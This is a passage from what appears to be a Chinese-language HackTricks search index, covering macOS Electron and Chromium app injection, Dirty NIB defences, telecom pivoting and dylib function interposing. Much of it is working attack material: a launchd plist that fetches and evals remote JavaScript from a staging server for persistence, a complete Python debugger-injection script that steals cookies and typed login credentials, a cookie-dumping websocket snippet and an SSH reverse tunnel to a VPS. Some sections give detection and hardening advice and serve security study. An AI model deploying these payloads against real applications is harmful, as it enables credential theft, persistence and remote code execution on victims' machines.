--predicate \'processImagePath CONTAINS[cd] \\".app/Contents/MacOS/\\" AND (eventMessage CONTAINS[cd] \\"AppleScript\\" OR eventMessage CONTAINS[cd] \\"loadAppleScriptObjectiveCScripts\\")\' 主动评估 定期对关键应用运行 codesign --verify --deep,以确保资源保持完整。 权限上下文 审计哪些用户/进程拥有 TCC “App Management” 或 Full Disk Access(尤其是终端和管理代理)。将这些权限从通用 shell 中移除,可以防止轻易重新启用 Dirty NIB‑style 的篡改。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Dirty NIB » 检测与 DFIR 建议","id":"2357","title":"检测与 DFIR 建议"},"2358":{"body":"优先使用编程式 UI 或限制从 nib 实例化的内容。避免在 nib 图中包含强力类(例如 NSTask),并避免会间接对任意对象调用 selectors 的 bindings。 采用带有 Library Validation 的 hardened runtime(现代应用已普遍使用)。虽然这本身无法阻止 nib injection,但它会阻断轻易的本地代码加载,迫使攻击者仅使用脚本型 payloads。 不要在通用工具中请求或依赖广泛的 App Management 权限。如果 
MDM 需要 App Management,将该上下文与用户驱动的 shell 隔离开来。 定期验证应用 bundle 的完整性,并使你的更新机制能够自我修复 bundle 资源。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Dirty NIB » 防御加固(开发者和防御者)","id":"2358","title":"防御加固(开发者和防御者)"},"2359":{"body":"了解更多影响此技术的 Gatekeeper、quarantine 与 provenance 更改: macOS Gatekeeper / Quarantine / XProtect","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Dirty NIB » HackTricks 相关阅读","id":"2359","title":"HackTricks 相关阅读"},"236":{"body":"","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 4. Pivoting 通过核心网络","id":"236","title":"4. Pivoting 通过核心网络"},"2360":{"body":"xpn – DirtyNIB(原始文章,包含 Pages 示例):https://blog.xpnsec.com/dirtynib/ Sector7 – Bringing process injection into view(s): exploiting all macOS apps using nib files (April 5, 2024): https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Dirty NIB » 参考资料","id":"2360","title":"参考资料"},"2361":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Chromium Injection » macOS Chromium Injection","id":"2361","title":"macOS Chromium Injection"},"2362":{"body":"基于 Chromium 的浏览器,如 Google Chrome、Microsoft Edge、Brave 等。这些浏览器建立在 Chromium 开源项目上,这意味着它们共享一个共同的基础,因此具有类似的功能和开发者选项。 --load-extension 标志 --load-extension 标志用于从命令行或脚本启动基于 Chromium 的浏览器。此标志允许在启动时 自动加载一个或多个扩展 到浏览器中。 --use-fake-ui-for-media-stream 标志 --use-fake-ui-for-media-stream 标志是另一个可以用于启动基于 Chromium 的浏览器的命令行选项。此标志旨在 绕过正常的用户提示,这些提示请求访问来自摄像头和麦克风的媒体流的权限 。使用此标志时,浏览器会自动授予任何请求访问摄像头或麦克风的网站或应用程序权限。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Chromium Injection » 基本信息","id":"2362","title":"基本信息"},"2363":{"body":"https://github.com/breakpointHQ/snoop https://github.com/breakpointHQ/VOODOO","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Chromium Injection » 工具","id":"2363","title":"工具"},"2364":{"body":"bash # Intercept traffic\\nvoodoo intercept -b chrome 在工具链接中找到更多示例","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Chromium Injection » 示例","id":"2364","title":"示例"},"2365":{"body":"https://twitter.com/RonMasas/status/1758106347222995007 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Chromium Injection » 参考","id":"2365","title":"参考"},"2366":{"body":"Reading time: 20 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » macOS Electron Applications Injection","id":"2366","title":"macOS Electron Applications Injection"},"2367":{"body":"如果你不知道 Electron 是什么,你可以在 这里找到很多信息 。但现在只需知道 Electron 运行 node 。 而 node 有一些 参数 和 环境变量 可以用来 执行其他代码 ,而不是指定的文件。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » 基本信息","id":"2367","title":"基本信息"},"2368":{"body":"这些技术将在接下来讨论,但最近 Electron 添加了几个 安全标志以防止它们 。这些是 Electron Fuses ,用于 防止 macOS 中的 Electron 应用 加载任意代码 : RunAsNode :如果禁用,它会阻止使用环境变量 ELECTRON_RUN_AS_NODE 来注入代码。 EnableNodeCliInspectArguments :如果禁用,像 --inspect、--inspect-brk 这样的参数将不被尊重。避免通过这种方式注入代码。 EnableEmbeddedAsarIntegrityValidation :如果启用,加载的 asar 文件 将由 macOS 验证 。以此方式 防止 通过修改该文件的内容进行 代码注入 。 OnlyLoadAppFromAsar :如果启用,它将只检查并使用 app.asar,而不是按以下顺序加载: app.asar 、 app ,最后是 default_app.asar 。因此确保当与 embeddedAsarIntegrityValidation fuse 结合 时, 不可能 加载未验证的代码 。 LoadBrowserProcessSpecificV8Snapshot :如果启用,浏览器进程使用名为 browser_v8_context_snapshot.bin 的文件作为其 V8 快照。 另一个有趣的 fuse 不会阻止代码注入的是: EnableCookieEncryption :如果启用,磁盘上的 cookie 存储将使用操作系统级别的加密密钥进行加密。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » Electron Fuses","id":"2368","title":"Electron Fuses"},"2369":{"body":"你可以通过以下方式 检查这些标志 : bash npx 
@electron/fuses read --app /Applications/Slack.app Analyzing app: Slack.app\\nFuse Version: v1\\nRunAsNode is Disabled\\nEnableCookieEncryption is Enabled\\nEnableNodeOptionsEnvironmentVariable is Disabled\\nEnableNodeCliInspectArguments is Disabled\\nEnableEmbeddedAsarIntegrityValidation is Enabled\\nOnlyLoadAppFromAsar is Enabled\\nLoadBrowserProcessSpecificV8Snapshot is Disabled","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » 检查 Electron Fuses","id":"2369","title":"检查 Electron Fuses"},"237":{"body":"OsmoGGSN 提供一个 SGSN 模拟器,能够 establish a PDP context towards a real GGSN/PGW 。 一旦协商完成,Linux 会收到一个新的 tun0 接口,可从漫游对端访问。 bash sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \\\\\\n-APN internet -c 1 -d\\nip route add 172.16.0.0/12 dev tun0\\nmicrosocks -p 1080 & # internal SOCKS proxy With proper firewall hair-pinning, this tunnel bypasses signalling-only VLANs and lands you directly in the data plane .","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 4.1 sgsnemu + SOCKS5","id":"237","title":"4.1 sgsnemu + SOCKS5"},"2370":{"body":"正如 文档提到的 , Electron Fuses 的配置是在 Electron binary 内部配置的,其中包含字符串 dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX 。 在 macOS 应用程序中,这通常位于 application.app/Contents/Frameworks/Electron Framework.framework/Electron Framework bash grep -R \\"dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX\\" Slack.app/\\nBinary file Slack.app//Contents/Frameworks/Electron Framework.framework/Versions/A/Electron Framework matches 您可以在 https://hexed.it/ 中加载此文件并搜索前面的字符串。在此字符串之后,您可以在 ASCII 中看到一个数字 \\"0\\" 或 \\"1\\",指示每个保险丝是禁用还是启用。只需修改十六进制代码(0x30 是 0,0x31 是 1)以 修改保险丝值 。 请注意,如果您尝试 覆盖 应用程序内部的 Electron Framework 二进制文件并修改这些字节,则应用程序将无法运行。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » 修改 Electron Fuses","id":"2370","title":"修改 Electron Fuses"},"2371":{"body":"可能有 外部 JS/HTML 文件 被 Electron 
应用程序使用,因此攻击者可以在这些文件中注入代码,这些文件的签名不会被检查,并在应用程序的上下文中执行任意代码。 caution 但是,目前有 2 个限制: 修改应用程序需要 kTCCServiceSystemPolicyAppBundles 权限,因此默认情况下这不再可能。 编译后的 asap 文件通常具有 embeddedAsarIntegrityValidation 和 onlyLoadAppFromAsar 启用 这使得攻击路径更加复杂(或不可能)。 请注意,可以通过将应用程序复制到另一个目录(如 /tmp ),将文件夹 app.app/Contents 重命名为 app.app/NotCon , 修改 asar 文件以包含您的 恶意 代码,然后将其重命名回 app.app/Contents 并执行它,从而绕过 kTCCServiceSystemPolicyAppBundles 的要求。 您可以使用以下命令从 asar 文件中解压代码: bash npx asar extract app.asar app-decomp 将其打包回来,修改为: bash npx asar pack app-decomp app-new.asar","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » 向 Electron 应用程序添加 RCE 代码","id":"2371","title":"向 Electron 应用程序添加 RCE 代码"},"2372":{"body":"根据 文档 ,如果设置了这个环境变量,它将以普通的 Node.js 进程启动该进程。 bash # Run this\\nELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord\\n# Then from the nodeJS console execute:\\nrequire(\'child_process\').execSync(\'/System/Applications/Calculator.app/Contents/MacOS/Calculator\') caution 如果熔断器 RunAsNode 被禁用,环境变量 ELECTRON_RUN_AS_NODE 将被忽略,这将无法工作。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » RCE with ELECTRON_RUN_AS_NODE","id":"2372","title":"RCE with ELECTRON_RUN_AS_NODE"},"2373":{"body":"正如 这里提到的 ,您可以在 plist 中滥用这个环境变量以保持持久性: xml \\n\\n\\n\\nEnvironmentVariables\\n\\nELECTRON_RUN_AS_NODE\\ntrue\\n\\nLabel\\ncom.xpnsec.hideme\\nProgramArguments\\n\\n/Applications/Slack.app/Contents/MacOS/Slack\\n-e\\nconst { spawn } = require(\\"child_process\\"); spawn(\\"osascript\\", [\\"-l\\",\\"JavaScript\\",\\"-e\\",\\"eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding( $.NSData.dataWithContentsOfURL( $.NSURL.URLWithString(\'http://stagingserver/apfell.js\')), $.NSUTF8StringEncoding)));\\"]);\\n\\nRunAtLoad\\n\\n\\n","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » 从应用程序 Plist 注入","id":"2373","title":"从应用程序 Plist 
注入"},"2374":{"body":"您可以将有效负载存储在不同的文件中并执行它: bash # Content of /tmp/payload.js\\nrequire(\'child_process\').execSync(\'/System/Applications/Calculator.app/Contents/MacOS/Calculator\'); # Execute\\nNODE_OPTIONS=\\"--require /tmp/payload.js\\" ELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord caution 如果熔断器 EnableNodeOptionsEnvironmentVariable 被 禁用 ,则应用在启动时将 忽略 环境变量 NODE_OPTIONS ,除非环境变量 ELECTRON_RUN_AS_NODE 被设置,如果熔断器 RunAsNode 被禁用,该变量也将被 忽略 。 如果您不设置 ELECTRON_RUN_AS_NODE ,您将会发现 错误 :Most NODE_OPTIONs are not supported in packaged apps. See documentation for more details.","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » RCE with NODE_OPTIONS","id":"2374","title":"RCE with NODE_OPTIONS"},"2375":{"body":"您可以在 plist 中滥用此环境变量以保持持久性,添加以下键: xml \\nEnvironmentVariables\\n\\nELECTRON_RUN_AS_NODE\\ntrue\\nNODE_OPTIONS\\n--require /tmp/payload.js\\n\\nLabel\\ncom.hacktricks.hideme\\nRunAtLoad\\n\\n","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » 从 App Plist 注入","id":"2375","title":"从 App Plist 注入"},"2376":{"body":"根据 这个 的说法,如果你使用 --inspect 、 --inspect-brk 和 --remote-debugging-port 等标志执行 Electron 应用程序,将会 打开一个调试端口 ,这样你就可以连接到它(例如从 Chrome 的 chrome://inspect),并且你将能够 在其上注入代码 ,甚至启动新进程。 例如: bash /Applications/Signal.app/Contents/MacOS/Signal --inspect=9229\\n# Connect to it using chrome://inspect and execute a calculator with:\\nrequire(\'child_process\').execSync(\'/System/Applications/Calculator.app/Contents/MacOS/Calculator\') 在 这篇博客 中,这种调试被滥用,使得无头 Chrome 在任意位置下载任意文件 。 tip 如果一个应用有其自定义的方式来检查环境变量或参数,例如 --inspect 是否设置,你可以尝试在运行时使用参数 --inspect-brk 绕过 它,这将 在应用开始时停止执行 并执行一个绕过(例如,覆盖当前进程的参数或环境变量)。 以下是一个利用监控和执行带有参数 --inspect-brk 的应用的漏洞,通过这种方式可以绕过它的自定义保护(覆盖进程的参数以移除 --inspect-brk),然后注入一个 JS 负载以转储应用的 cookies 和凭据: python import asyncio\\nimport websockets\\nimport json\\nimport requests\\nimport os\\nimport psutil\\nfrom time import sleep 
INSPECT_URL = None\\nCONT = 0\\nCONTEXT_ID = None\\nNAME = None\\nUNIQUE_ID = None JS_PAYLOADS = \\"\\"\\"\\nvar { webContents } = require(\'electron\');\\nvar fs = require(\'fs\'); var wc = webContents.getAllWebContents()[0] function writeToFile(filePath, content) {\\nconst data = typeof content === \'string\' ? content : JSON.stringify(content, null, 2); fs.writeFile(filePath, data, (err) => {\\nif (err) {\\nconsole.error(`Error writing to file ${filePath}:`, err);\\n} else {\\nconsole.log(`File written successfully at ${filePath}`);\\n}\\n});\\n} function get_cookies() {\\nintervalIdCookies = setInterval(() => {\\nconsole.log(\\"Checking cookies...\\");\\nwc.session.cookies.get({})\\n.then((cookies) => {\\ntokenCookie = cookies.find(cookie => cookie.name === \\"token\\");\\nif (tokenCookie){\\nwriteToFile(\\"/tmp/cookies.txt\\", cookies);\\nclearInterval(intervalIdCookies);\\nwc.executeJavaScript(`alert(\\"Cookies stolen and written to /tmp/cookies.txt\\")`);\\n}\\n})\\n}, 1000);\\n} function get_creds() {\\nin_location = false;\\nintervalIdCreds = setInterval(() => {\\nif (wc.mainFrame.url.includes(\\"https://www.victim.com/account/login\\")) {\\nin_location = true;\\nconsole.log(\\"Injecting creds logger...\\");\\nwc.executeJavaScript(`\\n(function() {\\nemail = document.getElementById(\'login_email_id\');\\npassword = document.getElementById(\'login_password_id\');\\nif (password && email) {\\nreturn email.value+\\":\\"+password.value;\\n}\\n})();\\n`).then(result => {\\nwriteToFile(\\"/tmp/victim_credentials.txt\\", result);\\n})\\n}\\nelse if (in_location) {\\nwc.executeJavaScript(`alert(\\"Creds stolen and written to /tmp/victim_credentials.txt\\")`);\\nclearInterval(intervalIdCreds);\\n}\\n}, 10); // Check every 10ms\\nsetTimeout(() => clearInterval(intervalId), 20000); // Stop after 20 seconds\\n} get_cookies();\\nget_creds();\\nconsole.log(\\"Payloads injected\\");\\n\\"\\"\\" async def get_debugger_url():\\n\\"\\"\\"\\nFetch the local inspector\'s 
WebSocket URL from the JSON endpoint.\\nAssumes there\'s exactly one debug target.\\n\\"\\"\\"\\nglobal INSPECT_URL url = \\"http://127.0.0.1:9229/json\\"\\nresponse = requests.get(url)\\ndata = response.json()\\nif not data:\\nraise RuntimeError(\\"No debug targets found on port 9229.\\")\\n# data[0] should contain an object with \\"webSocketDebuggerUrl\\"\\nws_url = data[0].get(\\"webSocketDebuggerUrl\\")\\nif not ws_url:\\nraise RuntimeError(\\"webSocketDebuggerUrl not found in inspector data.\\")\\nINSPECT_URL = ws_url async def monitor_victim():\\nprint(\\"Monitoring victim process...\\")\\nfound = False\\nwhile not found:\\nsleep(1) # Check every second\\nfor process in psutil.process_iter(attrs=[\'pid\', \'name\']):\\ntry:\\n# Check if the process name contains \\"victim\\"\\nif process.info[\'name\'] and \'victim\' in process.info[\'name\']:\\nfound = True\\nprint(f\\"Found victim process (PID: {process.info[\'pid\']}). Terminating...\\")\\nos.kill(process.info[\'pid\'], 9) # Force kill the process\\nexcept (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):\\n# Handle processes that might have terminated or are inaccessible\\npass\\nos.system(\\"open /Applications/victim.app --args --inspect-brk\\") async def bypass_protections():\\nglobal CONTEXT_ID, NAME, UNIQUE_ID\\nprint(f\\"Connecting to {INSPECT_URL} ...\\") async with websockets.connect(INSPECT_URL) as ws:\\ndata = await send_cmd(ws, \\"Runtime.enable\\", get_first=True)\\nCONTEXT_ID = data[\\"params\\"][\\"context\\"][\\"id\\"]\\nNAME = data[\\"params\\"][\\"context\\"][\\"name\\"]\\nUNIQUE_ID = data[\\"params\\"][\\"context\\"][\\"uniqueId\\"] sleep(1) await send_cmd(ws, \\"Debugger.enable\\", {\\"maxScriptsCacheSize\\": 10000000}) await send_cmd(ws, \\"Profiler.enable\\") await send_cmd(ws, \\"Debugger.setBlackboxPatterns\\", {\\"patterns\\": [\\"/node_modules/|/browser_components/\\"], \\"skipAnonnymous\\": False}) await send_cmd(ws, \\"Runtime.runIfWaitingForDebugger\\") await 
send_cmd(ws, \\"Runtime.executionContextCreated\\", get_first=False, params={\\"context\\": {\\"id\\": CONTEXT_ID, \\"origin\\": \\"\\", \\"name\\": NAME, \\"uniqueId\\": UNIQUE_ID, \\"auxData\\": {\\"isDefault\\": True}}}) code_to_inject = \\"\\"\\"process[\'argv\'] = [\'/Applications/victim.app/Contents/MacOS/victim\']\\"\\"\\"\\nawait send_cmd(ws, \\"Runtime.evaluate\\", get_first=False, params={\\"expression\\": code_to_inject, \\"uniqueContextId\\":UNIQUE_ID})\\nprint(\\"Injected code to bypass protections\\") async def js_payloads():\\nglobal CONT, CONTEXT_ID, NAME, UNIQUE_ID print(f\\"Connecting to {INSPECT_URL} ...\\") async with websockets.connect(INSPECT_URL) as ws:\\ndata = await send_cmd(ws, \\"Runtime.enable\\", get_first=True)\\nCONTEXT_ID = data[\\"params\\"][\\"context\\"][\\"id\\"]\\nNAME = data[\\"params\\"][\\"context\\"][\\"name\\"]\\nUNIQUE_ID = data[\\"params\\"][\\"context\\"][\\"uniqueId\\"]\\nawait send_cmd(ws, \\"Runtime.compileScript\\", get_first=False, params={\\"expression\\":JS_PAYLOADS,\\"sourceURL\\":\\"\\",\\"persistScript\\":False,\\"executionContextId\\":1})\\nawait send_cmd(ws, \\"Runtime.evaluate\\", get_first=False, params={\\"expression\\":JS_PAYLOADS,\\"objectGroup\\":\\"console\\",\\"includeCommandLineAPI\\":True,\\"silent\\":False,\\"returnByValue\\":False,\\"generatePreview\\":True,\\"userGesture\\":False,\\"awaitPromise\\":False,\\"replMode\\":True,\\"allowUnsafeEvalBlockedByCSP\\":True,\\"uniqueContextId\\":UNIQUE_ID}) async def main():\\nawait monitor_victim()\\nsleep(3)\\nawait get_debugger_url()\\nawait bypass_protections() sleep(7) await js_payloads() async def send_cmd(ws, method, get_first=False, params={}):\\n\\"\\"\\"\\nSend a command to the inspector and read until we get a response with matching \\"id\\".\\n\\"\\"\\"\\nglobal CONT CONT += 1 # Send the command\\nawait ws.send(json.dumps({\\"id\\": CONT, \\"method\\": method, \\"params\\": params}))\\nsleep(0.4) # Read messages until we get our command 
result\\nwhile True:\\nresponse = await ws.recv()\\ndata = json.loads(response) # Print for debugging\\nprint(f\\"[{method} / {CONT}] ->\\", data) if get_first:\\nreturn data # If this message is a response to our command (by matching \\"id\\"), break\\nif data.get(\\"id\\") == CONT:\\nreturn data # Otherwise it\'s an event or unrelated message; keep reading if __name__ == \\"__main__\\":\\nasyncio.run(main()) caution 如果熔断器 EnableNodeCliInspectArguments 被禁用,应用程序将 忽略节点参数 (如 --inspect),除非环境变量 ELECTRON_RUN_AS_NODE 被设置,如果熔断器 RunAsNode 被禁用,该变量也将被 忽略 。 然而,您仍然可以使用 electron 参数 --remote-debugging-port=9229 ,但之前的有效载荷将无法执行其他进程。 使用参数 --remote-debugging-port=9222 可以从 Electron 应用程序中窃取一些信息,如 历史记录 (使用 GET 命令)或浏览器的 cookies (因为它们在浏览器内部 解密 ,并且有一个 json 端点 可以提供它们)。 您可以在 这里 和 这里 学习如何做到这一点,并使用自动工具 WhiteChocolateMacademiaNut 或简单的脚本,如: python import websocket\\nws = websocket.WebSocket()\\nws.connect(\\"ws://localhost:9222/devtools/page/85976D59050BFEFDBA48204E3D865D00\\", suppress_origin=True)\\nws.send(\'{\\\\\\"id\\\\\\": 1, \\\\\\"method\\\\\\": \\\\\\"Network.getAllCookies\\\\\\"}\')\\nprint(ws.recv()","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » RCE with inspecting","id":"2376","title":"RCE with inspecting"},"2377":{"body":"您可以在 plist 中滥用此环境变量以保持持久性,添加以下键: xml \\nProgramArguments\\n\\n/Applications/Slack.app/Contents/MacOS/Slack\\n--inspect\\n\\nLabel\\ncom.hacktricks.hideme\\nRunAtLoad\\n\\n","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » 从应用程序 Plist 注入","id":"2377","title":"从应用程序 Plist 注入"},"2378":{"body":"tip macOS 的 TCC 守护进程不会检查应用程序的执行版本。因此,如果您 无法使用任何先前的技术在 Electron 应用程序中注入代码 ,您可以下载该应用程序的早期版本并在其上注入代码,因为它仍然会获得 TCC 权限(除非信任缓存阻止它)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » TCC Bypass abusing Older Versions","id":"2378","title":"TCC Bypass abusing Older 
Versions"},"2379":{"body":"先前的技术将允许您在 Electron 应用程序的进程中运行 JS 代码 。但是,请记住, 子进程在与父应用程序相同的沙箱配置文件下运行 ,并且 继承它们的 TCC 权限 。 因此,如果您想利用权限访问摄像头或麦克风,例如,您可以直接 从进程中运行另一个二进制文件 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » Run non JS Code","id":"2379","title":"Run non JS Code"},"238":{"body":"DNS 在漫游基础设施中几乎总是开放的。 将内部 SSH 服务暴露到你的 VPS(监听 :53),随后可以从家中回连: bash ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com 确认 VPS 上已启用 GatewayPorts yes。","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 4.2 SSH Reverse Tunnel over Port 53","id":"238","title":"4.2 SSH Reverse Tunnel over Port 53"},"2380":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » Notable Electron macOS Vulnerabilities (2023-2024)","id":"2380","title":"Notable Electron macOS Vulnerabilities (2023-2024)"},"2381":{"body":"Electron ≤22.3.23 和各种 23-27 预发布版本允许具有写入权限的攻击者绕过 embeddedAsarIntegrityValidation 和 onlyLoadAppFromAsar 保护。该漏洞是完整性检查器中的 文件类型混淆 ,使得一个精心制作的 名为 app.asar 的目录 被加载,而不是经过验证的归档,因此放置在该目录中的任何 JavaScript 在应用程序启动时都会被执行。因此,即使是遵循了加固指导并启用了这两个保护的供应商,在 macOS 上仍然存在漏洞。 已修补的 Electron 版本: 22.3.24 、 24.8.3 、 25.8.1 、 26.2.1 和 27.0.0-alpha.7 。发现运行旧版本应用程序的攻击者可以用自己的目录覆盖 Contents/Resources/app.asar,以使用应用程序的 TCC 权限执行代码。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » CVE-2023-44402 – ASAR integrity bypass","id":"2381","title":"CVE-2023-44402 – ASAR integrity bypass"},"2382":{"body":"在 2024 年 1 月,一系列 CVE(CVE-2024-23738 至 CVE-2024-23743)突显出许多 Electron 应用程序仍然启用了 RunAsNode 和 EnableNodeCliInspectArguments 保护。因此,本地攻击者可以通过环境变量 ELECTRON_RUN_AS_NODE=1 或标志如 --inspect-brk 重新启动程序,将其转变为 通用 Node.js 进程,并继承所有应用程序的沙箱和 TCC 权限。 尽管 Electron 团队对“关键”评级提出异议,并指出攻击者已经需要本地代码执行,但该问题在后期利用中仍然有价值,因为它将任何易受攻击的 Electron 包转变为 living-off-the-land 二进制文件,例如可以读取联系人、照片或其他先前授予桌面应用程序的敏感资源。 Electron 维护者的防御指导: 在生产版本中禁用 RunAsNode 和 
EnableNodeCliInspectArguments 熔断器。 如果您的应用程序确实需要辅助 Node.js 进程,请使用更新的 UtilityProcess API,而不是重新启用这些熔断器。
/Applications/Discord.app started the debug WebSocket server\\nThe webSocketDebuggerUrl is: ws://127.0.0.1:13337/8e0410f0-00e8-4e0e-92e4-58984daf37e5\\nShell binding requested. Check `nc 127.0.0.1 12345` https://github.com/boku7/Loki Loki 旨在通过用 Loki 命令与控制 JavaScript 文件替换应用程序的 JavaScript 文件来对 Electron 应用程序进行后门攻击。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » Automatic Injection","id":"2383","title":"Automatic Injection"},"2384":{"body":"https://www.electronjs.org/docs/latest/tutorial/fuses https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks https://github.com/electron/electron/security/advisories/GHSA-7m48-wc93-9g85 https://www.electronjs.org/blog/statement-run-as-node-cves https://m.youtube.com/watch?v=VWQY5R2A6X8 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » References","id":"2384","title":"References"},"2385":{"body":"Reading time: 12 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Function Hooking » macOS 函数钩子","id":"2385","title":"macOS 函数钩子"},"2386":{"body":"创建一个 dylib ,并包含一个 __interpose (__DATA___interpose) 部分(或一个标记为 S_INTERPOSING 的部分),其中包含指向 原始 和 替代 函数的 函数指针 元组。 然后,使用 DYLD_INSERT_LIBRARIES 注入 dylib(插入需要在主应用加载之前发生)。显然,适用于 DYLD_INSERT_LIBRARIES 使用的 限制 在这里也适用 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Function Hooking » 函数插入","id":"2386","title":"函数插入"},"2387":{"body":"interpose.c\\nhello.c\\ninterpose2.c interpose.c\\" overflow=\\"wrap // gcc -dynamiclib interpose.c -o interpose.dylib\\n#include \\n#include int my_printf(const char *format, ...) {\\n//va_list args;\\n//va_start(args, format);\\n//int ret = vprintf(format, args);\\n//va_end(args); int ret = printf(\\"Hello from interpose\\\\n\\");\\nreturn ret;\\n} __attribute__((used)) static struct { const void *replacement; const void *replacee; } _interpose_printf\\n__attribute__ ((section (\\"__DATA,__interpose\\"))) = { (const void *)(unsigned long)&my_printf, (const void *)(unsigned long)&printf }; c //gcc hello.c -o hello\\n#include int main() {\\nprintf(\\"Hello World!\\\\n\\");\\nreturn 0;\\n} c // Just another way to define an interpose\\n// gcc -dynamiclib interpose2.c -o interpose2.dylib #include #define DYLD_INTERPOSE(_replacement, _replacee) \\\\\\n__attribute__((used)) static struct { \\\\\\nconst void* replacement; \\\\\\nconst void* replacee; \\\\\\n} _interpose_##_replacee __attribute__ ((section(\\"__DATA, __interpose\\"))) = { \\\\\\n(const void*) 